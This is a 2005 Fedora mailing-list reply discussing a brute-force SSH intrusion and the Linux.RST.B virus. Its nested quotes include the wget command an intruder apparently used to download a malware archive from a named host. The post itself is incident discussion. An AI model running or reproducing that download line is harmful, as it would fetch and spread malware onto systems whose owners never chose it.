brute force ssh attack
Jeff Vian
jvian10 at charter.net
Wed Apr 27 22:22:07 UTC 2005
On Wed, 2005-04-27 at 15:50 +0100, Nigel Wade wrote:
> Gustavo Seabra wrote:
> > On 4/27/05, Håkan Persson <hakan at zyberit.com> wrote:
> >
> >>Daniel Kirsten wrote:
> >>
> >>
> >>>wget www.ring.as.ro/x/qwe.tgz
> >>>
> >>>
> >>
> >>This is what Symantec thinks of the content of the file:
> >>http://securityresponse.symantec.com/avcenter/venc/data/linux.rst.b.html
> >>
> >>/Håkan
> >
> >
> > Well, so much for the "do not wory about viruses in Linux machines" stories...
> >
>
> Number of infections 0-49, number of sites 0-2 - over 3 years.
> Wow, it's speading like wildfire... help, help!
>
> It has no escalation mechanism, so can only infect ELF files to which the
> user infected has write permission.
>
> Threat ~0.
>
>
not true.
it also infects files in /bin as stated by symantic and as stated by
Daniel. Thus it has some method of getting root privileges.
More information about the fedora-list
mailing list